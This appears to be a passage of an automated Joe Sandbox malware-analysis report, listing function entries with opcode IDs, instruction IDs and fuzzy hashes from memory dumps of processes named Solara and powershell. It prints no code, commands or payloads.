                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b53e68bec2fcc632ad60f13ce41dea413f870ea83a0f5dfd5c0063f35fba354d
                                                                • Instruction ID: 3b410b73f37372e78e7b5e139f4e81482755dc93fe6ebadb03f1d649edc206b3
                                                                • Opcode Fuzzy Hash: b53e68bec2fcc632ad60f13ce41dea413f870ea83a0f5dfd5c0063f35fba354d
                                                                • Instruction Fuzzy Hash: E522E561B1DA494FE7A8EB6C84756B877D2FF98300F9505BDE01EC72D6DE28B8018781
                                                                Function 00007FFD9B69204D Relevance: .2, Instructions: 195COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5aa4121b8eb2512585eb1c9550dc6f2a85518bacb54f12c039638913d02a2728
                                                                • Instruction ID: 4d7a6d10ab099e8086ca1b7cc33052466ed7a6debd598276450595f592ca9e62
                                                                • Opcode Fuzzy Hash: 5aa4121b8eb2512585eb1c9550dc6f2a85518bacb54f12c039638913d02a2728
                                                                • Instruction Fuzzy Hash: E351FE10B1E6C90FE7AAABB858746756FD1DF87215B0800FBE09DCB1E7DD086806C342
                                                                Function 00007FFD9B691190 Relevance: .6, Instructions: 583COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a6ab05c96f3f8fad3419d2a1680f3efa6bcf356ef965d17d4a239524987a781a
                                                                • Instruction ID: 4bb71fbce786852dc06a3ef516a13649c1e89afcca53138e1a246c86a5c064f3
                                                                • Opcode Fuzzy Hash: a6ab05c96f3f8fad3419d2a1680f3efa6bcf356ef965d17d4a239524987a781a
                                                                • Instruction Fuzzy Hash: 8631D462E0EB8A5FE755A7AC98B10E97FB1EF45710B4940B7C099CF1E3DD2879068350
                                                                Function 00007FFD9B690C2E Relevance: .2, Instructions: 217COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 28ec82ed98b4e35c26553ef78e23d75f2d88c710cf0ed5acbc87e8fd4094b44e
                                                                • Instruction ID: a8438ac5df00a2548143457e636ae788881381f1da1d1d58cfdbcf53b96fca43
                                                                • Opcode Fuzzy Hash: 28ec82ed98b4e35c26553ef78e23d75f2d88c710cf0ed5acbc87e8fd4094b44e
                                                                • Instruction Fuzzy Hash: 74511611B0F6CA0FE7A6977848255797BD1EF86614B0900FBD4ACCB2EBDD18BC468352
                                                                Function 00007FFD9B690AC9 Relevance: .2, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a8c6ff1ba5ae70b5b43516451143ead5aba5739fca98d257855a2c5ab574822c
                                                                • Instruction ID: 3ebcc160d5176793345e463155bb764f8478518fd18ea4fb111d0ce9f4fc33d3
                                                                • Opcode Fuzzy Hash: a8c6ff1ba5ae70b5b43516451143ead5aba5739fca98d257855a2c5ab574822c
                                                                • Instruction Fuzzy Hash: D0412921B189494FEB84BBBC58667BE77D2EFD8300F5441B6E01CC72CBDE2868428391
                                                                Function 00007FFD9B690558 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 65a1e7a9bfc87c1d7b713ca091ca636e3b1355619cdddbe8a2b2ffcaef3a9d87
                                                                • Instruction ID: bbdf50a877857d68dfbc35aca3f5e81bf37e6e9675d3a51c81b8b1fc25db7733
                                                                • Opcode Fuzzy Hash: 65a1e7a9bfc87c1d7b713ca091ca636e3b1355619cdddbe8a2b2ffcaef3a9d87
                                                                • Instruction Fuzzy Hash: 6431E421B1C94D0FE79CEA6C946A679A7C2EF98315F4401BEE45EC32E7DD64AC428341
                                                                Function 00007FFD9B690985 Relevance: .1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dd4b0fe9451cf2b5a097919d52ed3da30d747766d3c6e8c5a03057b58ca9d72b
                                                                • Instruction ID: 7df123511a90d9fcf360fff4e1d4de18c8bbd2a6984531f2057a30fc60c87fe2
                                                                • Opcode Fuzzy Hash: dd4b0fe9451cf2b5a097919d52ed3da30d747766d3c6e8c5a03057b58ca9d72b
                                                                • Instruction Fuzzy Hash: 84316471B18A0D4FDB84EBACC4756FD7BA1FF98300F954579D019D7296DE3868418740
                                                                Function 00007FFD9B69082D Relevance: .1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4d17d36317dc3eeba56c6910a237dc0b8ddf995e8c3fddfd97f8ac79ce15b73e
                                                                • Instruction ID: 08d7b5f3f2be1b46dfde83413fa8466511667b47eaf0ea0161d85d16417f87e5
                                                                • Opcode Fuzzy Hash: 4d17d36317dc3eeba56c6910a237dc0b8ddf995e8c3fddfd97f8ac79ce15b73e
                                                                • Instruction Fuzzy Hash: F531D562B5EA894FDB94DB6C54719B87FA1FF84300B9584BDD0188F3DBCE28A901C781
                                                                Function 00007FFD9B692201 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.1891027470.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd9b690000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 22bd4ab24030a470a679ad03ce3ba9e29383b0015948835e5a206fff74c47e08
                                                                • Instruction ID: 7a42ac93fb18c5b115dbc033f838b56e5f546fc3001f5c0d37f6c2886822e91c
                                                                • Opcode Fuzzy Hash: 22bd4ab24030a470a679ad03ce3ba9e29383b0015948835e5a206fff74c47e08
                                                                • Instruction Fuzzy Hash: 28216722B0EA890FE795A76CA8609347FD0EF96321B0906EBE459CB1E7D814BD418381

                                                                Executed Functions

                                                                Function 00007FFD9B796660 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2067819926.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b790000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: X7V@
                                                                • API String ID: 0-2498015238
                                                                • Opcode ID: 1493723f20632f7c7dca54c1e981e96be8a9c90f8f04fd15b219484a00266414
                                                                • Instruction ID: 1915cc04a8a1beaf59bd23676a3b5092a4c90b0c52e155e1c78f87b892146755
                                                                • Opcode Fuzzy Hash: 1493723f20632f7c7dca54c1e981e96be8a9c90f8f04fd15b219484a00266414
                                                                • Instruction Fuzzy Hash: F9C14632B0EB8E0FEBA5ABA848659B57BD1EF55394B0903BED44DC70F7D918E8018341
                                                                Function 00007FFD9B6C644D Relevance: .7, Instructions: 729COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2066757140.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b6c0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b625015b52d108d9dea9d661b0e0283ac220299694a88fd34a862e8e999594cb
                                                                • Instruction ID: d27e1af0b797b3b7343a84f581091865c54b42e9e2185de907da8c8bde68157f
                                                                • Opcode Fuzzy Hash: b625015b52d108d9dea9d661b0e0283ac220299694a88fd34a862e8e999594cb
                                                                • Instruction Fuzzy Hash: D3D19F30A09A4D8FDF94EF5CC465AA9BBE1FF68300F15416AD419DB2A6CA34F841CB81
                                                                Function 00007FFD9B6CA0E0 Relevance: .3, Instructions: 268COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2066757140.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b6c0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e192a830657932388a19b9ee479e06bd0a81fd0a568dac70e0e4c241db3530c8
                                                                • Instruction ID: 27a88bf9843cf5c803e12964cfe3a9156f7344b1802eb415f989689d9d2b514d
                                                                • Opcode Fuzzy Hash: e192a830657932388a19b9ee479e06bd0a81fd0a568dac70e0e4c241db3530c8
                                                                • Instruction Fuzzy Hash: 30214726A0EBCD4FD757AB285C750E47FB0EE1321870E42E7C098CF0A3D918680A8392
                                                                Function 00007FFD9B6C9D58 Relevance: .2, Instructions: 220COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2066757140.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b6c0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8ba0903537d8e9f07701e292b2ddd819850d26b14b99f8cfd98ab6867deb7950
                                                                • Instruction ID: 0eb30f0a0d035206e160541f50236888801e12e326de39dfb35e1803c129766e
                                                                • Opcode Fuzzy Hash: 8ba0903537d8e9f07701e292b2ddd819850d26b14b99f8cfd98ab6867deb7950
                                                                • Instruction Fuzzy Hash: 21F08235919A8C8FDB66FF6888695F87FE0FF25304B0501EBE85DCB071DA25A918C781
                                                                Function 00007FFD9B6C976E Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2066757140.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b6c0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e66c916a615539c0b4a5a6dcafbc5e4517eff8cde7a3059d744ec3e484373763
                                                                • Instruction ID: 5d9c17eee365952279d00af2f5cb5d2e354dee0c5a021af48fede8958c8330b0
                                                                • Opcode Fuzzy Hash: e66c916a615539c0b4a5a6dcafbc5e4517eff8cde7a3059d744ec3e484373763
                                                                • Instruction Fuzzy Hash: 5241183191DB8C4FDB199F5C980A6B97BE0FB96710F04426FE459C3292CA70A916CBC6
                                                                Function 00007FFD9B5AF360 Relevance: .1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2065754120.00007FFD9B5AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5AD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b5ad000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a74154699f0efe2a5f938a977c74ba4539550bcda9bb57a2fff3e84ade8cbd8e
                                                                • Instruction ID: cb2d9d2c99a898676b3bf285adcb54d8880c90686cfa2dd1b220a4d6ee7b1b5d
                                                                • Opcode Fuzzy Hash: a74154699f0efe2a5f938a977c74ba4539550bcda9bb57a2fff3e84ade8cbd8e
                                                                • Instruction Fuzzy Hash: ED418C7150EBC44FE7979B39AC519523FF0EF52320B0502DFD088CB1A7D625A846C7A2
                                                                Function 00007FFD9B6CA64C Relevance: .1, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2066757140.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b6c0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b42e71e781d65e5eef45b96087a1dd59295380f48bd52334606a4a9fc1be3191
                                                                • Instruction ID: 1bb5be6f240af03d853d4eae42dcabe79307483205507fcd0bcd6de33737dfb4
                                                                • Opcode Fuzzy Hash: b42e71e781d65e5eef45b96087a1dd59295380f48bd52334606a4a9fc1be3191
                                                                • Instruction Fuzzy Hash: 6431363190CB4C4FDB19DBAC9C4A7E97BE0EB56320F04426BD048C7192DA74A84ACB91
                                                                Function 00007FFD9B6C33B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2066757140.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b6c0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                • Instruction ID: 4e89666b9504b6f1087a15731764b9bf430b111ff54c79564ff2a36f390129c3
                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                • Instruction Fuzzy Hash: 4601A73020CB0C4FD748EF0CE051AB5B3E0FB89324F10056DE58AC36A1DA32E882CB41
                                                                Function 00007FFD9B79414D Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2067819926.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b790000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bbd739304f2adb21c75fc5ca23a0ce01a59ad6a1bc9a1afe1851de3855821f82
                                                                • Instruction ID: 831aeed6f48fa2399b4f406c043c720b0f85297253603bca95d33f49ad441a8a
                                                                • Opcode Fuzzy Hash: bbd739304f2adb21c75fc5ca23a0ce01a59ad6a1bc9a1afe1851de3855821f82
                                                                • Instruction Fuzzy Hash: 4CF0BE32B4E6098FD768EA4CE4518E873E0EF55320B1201BAE06DC71B3CA25EC40C781
                                                                Function 00007FFD9B794400 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2067819926.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b790000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f165ff80040a414cfa96e0a919bfb6f8236be3ae13e78658e6b7978e9c09b5cd
                                                                • Instruction ID: e11726ee670dcd9da4643ab5e809d47b3823107fa3260030f7f1dbde99f130f9
                                                                • Opcode Fuzzy Hash: f165ff80040a414cfa96e0a919bfb6f8236be3ae13e78658e6b7978e9c09b5cd
                                                                • Instruction Fuzzy Hash: D5F05E32B0E6498FDB64EA5CE4658A877E0FF4532075600BAE15DCB4B3DA25AC40C750
                                                                Function 00007FFD9B7941D1 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2067819926.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b790000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction ID: c0da639c7b1f78bb65a998d94686b0a805839dd149f30ec2aec6784d6ddfadf0
                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction Fuzzy Hash: AEE04F31B4C9089FDA78DA4CE0519E973E1EF98331B1202BBD14EC7671CA22ED51CB80

                                                                Non-executed Functions

                                                                Function 00007FFD9B6C8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2066757140.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9b6c0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                                • API String ID: 0-2350917820
                                                                • Opcode ID: acfec0235ed46b754dbabf02058d8915f9166f3fbab35e97f0c74ed2ccb2a49c
                                                                • Instruction ID: d575b36f7f100cb6f53ea939fc31e94cf7fcc7f045c0b0f962ba686e5b10f034
                                                                • Opcode Fuzzy Hash: acfec0235ed46b754dbabf02058d8915f9166f3fbab35e97f0c74ed2ccb2a49c
                                                                • Instruction Fuzzy Hash: DE213873B085155ACB0637BCB8519E97790DF5477838942F3E028CF093ED24A4CB8680

                                                                Executed Functions

                                                                Function 00007FFD9B681679 Relevance: .8, Instructions: 847COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08b55fd649dfb1d28518aa477dca70d8016ef4b6e1bf616362f33b14846c9212
                                                                • Instruction ID: 68800657dbe2d92d72b2dbfeb093346820ca76c915dd819aa425feee73b013ba
                                                                • Opcode Fuzzy Hash: 08b55fd649dfb1d28518aa477dca70d8016ef4b6e1bf616362f33b14846c9212
                                                                • Instruction Fuzzy Hash: AE42E771B19E094FE7A8EB6C8465AB977D2FF98300F4405B9E05EC72D6DE38B8418781
                                                                Function 00007FFD9B6816B9 Relevance: .7, Instructions: 675COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1100caa806037061e93f0c28a25071c83e7c6a535887a642f7080c871f0bcc88
                                                                • Instruction ID: 208ef6ba9c895cbf2a73312b09788869191468c42dfb72795908e40a8f10ce49
                                                                • Opcode Fuzzy Hash: 1100caa806037061e93f0c28a25071c83e7c6a535887a642f7080c871f0bcc88
                                                                • Instruction Fuzzy Hash: 4022D561B19E494FE7A8EB6C84796B977D2FF98300F4405B9E01EC72D6DE38B9018781
                                                                Function 00007FFD9B68204D Relevance: .2, Instructions: 195COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f57d2ce09d1a32716664bc7c28a2ee463a00988919f8389370fe8ea25d85ec47
                                                                • Instruction ID: 7030378f8ff11eccbf08767c3b1fd0bd2e24e103dd3896dbcbd684dd71509b0b
                                                                • Opcode Fuzzy Hash: f57d2ce09d1a32716664bc7c28a2ee463a00988919f8389370fe8ea25d85ec47
                                                                • Instruction Fuzzy Hash: B851FF10B1EAC94FE7A6ABB848746657FD1DF87215B0800FAE09DCB1E7DD186806C342
                                                                Function 00007FFD9B680C2E Relevance: .2, Instructions: 217COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 737c62f703f568436baef9d16e4b2b4780cedb898a82c6c68bcb4c69543c7807
                                                                • Instruction ID: 8326e0b8fb90def94531938a2a7eeaa958cac45991448c407f72cf74f51b4dbd
                                                                • Opcode Fuzzy Hash: 737c62f703f568436baef9d16e4b2b4780cedb898a82c6c68bcb4c69543c7807
                                                                • Instruction Fuzzy Hash: 94513811B0FAC90FE7669A7848755797BD2DF86614B0900FBD49CCB1EBDD28AC068352
                                                                Function 00007FFD9B680AC9 Relevance: .2, Instructions: 152COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 91cae073ddf801aae353dbea76817818c0be8248f0ba0c316ce415cd6b3a0dcb
                                                                • Instruction ID: 3450da27b676295435828b64004a9038c9d0b8c33576eececc167743f06d864a
                                                                • Opcode Fuzzy Hash: 91cae073ddf801aae353dbea76817818c0be8248f0ba0c316ce415cd6b3a0dcb
                                                                • Instruction Fuzzy Hash: 73411861F199094FEB44BBAC98697BE73D6EF98700F5445B6E01DC72D7DE2868028381
                                                                Function 00007FFD9B680558 Relevance: .1, Instructions: 137COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a1cba3a83b0133dbb6b9427ac9a1d8031d9496502782679563ca2f7243555b5a
                                                                • Instruction ID: 8e35917f4f5f0afe764cc91de152ae27b9edec6beafe45c929e5cf9900b5e1cb
                                                                • Opcode Fuzzy Hash: a1cba3a83b0133dbb6b9427ac9a1d8031d9496502782679563ca2f7243555b5a
                                                                • Instruction Fuzzy Hash: 6431E221B1C94D0FE798EA6C986A679B7C2EFD8315F4401BEE45EC32E7DD64AC428341
                                                                Function 00007FFD9B680985 Relevance: .1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5221ee5542a95fe40998aa878c1ee4caf6505aa9e5196daa6d39189c8dfe2985
                                                                • Instruction ID: d757c097e3828367e1ea39a17eb3e103786f5e0b93ddfd92eb5ff7e949e3908f
                                                                • Opcode Fuzzy Hash: 5221ee5542a95fe40998aa878c1ee4caf6505aa9e5196daa6d39189c8dfe2985
                                                                • Instruction Fuzzy Hash: A131C070B18A0E8FEB44EBB88471ABD77A1FF98300F9545B5D019C72DBDE38A9028750
                                                                Function 00007FFD9B68082D Relevance: .1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88f05baf98ce8ecc897647150257fc4dfbd71430ca9e61301680ba6eee970b78
                                                                • Instruction ID: e37c293d695b087a3e6f5e660a6089b4358581a32909b0717767b7b4124b75ae
                                                                • Opcode Fuzzy Hash: 88f05baf98ce8ecc897647150257fc4dfbd71430ca9e61301680ba6eee970b78
                                                                • Instruction Fuzzy Hash: E031D3A6B4D9498FDB58DB6C94B09B93FA1BFC5200B8444F5D0198B3EBDF38AD058391
                                                                Function 00007FFD9B682201 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c18b4399305e39abd870dee13c7cc3aa9475f2999bd36a115ac1e06263b6dda
                                                                • Instruction ID: a4118af01e3b15dd458e4774352b0a3628c7e4c1812acee53fe4e9c01336649b
                                                                • Opcode Fuzzy Hash: 3c18b4399305e39abd870dee13c7cc3aa9475f2999bd36a115ac1e06263b6dda
                                                                • Instruction Fuzzy Hash: 1D216722F0DA890FE751A76C98715747BD0EF96321B0905E6E899CB1E7D924BD418381
                                                                Function 00007FFD9B6815D2 Relevance: .0, Instructions: 16COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.1978157698.00007FFD9B680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B680000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_7ffd9b680000_Solara.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 92caa0dc9ee5dd42f923db73bf5a46a254027b57e06fac70d7f33dcca418422c
                                                                • Instruction ID: 0228cc8c526cef04e7bd1e32dd2abce9e59298e7aeb2cf0b32118d0f844e40c7
                                                                • Opcode Fuzzy Hash: 92caa0dc9ee5dd42f923db73bf5a46a254027b57e06fac70d7f33dcca418422c
                                                                • Instruction Fuzzy Hash: 0CD01761A24C1E4AE758A79888B55FEA7A1FF48280B8040B4903E961E6DE7439018240

                                                                Executed Functions

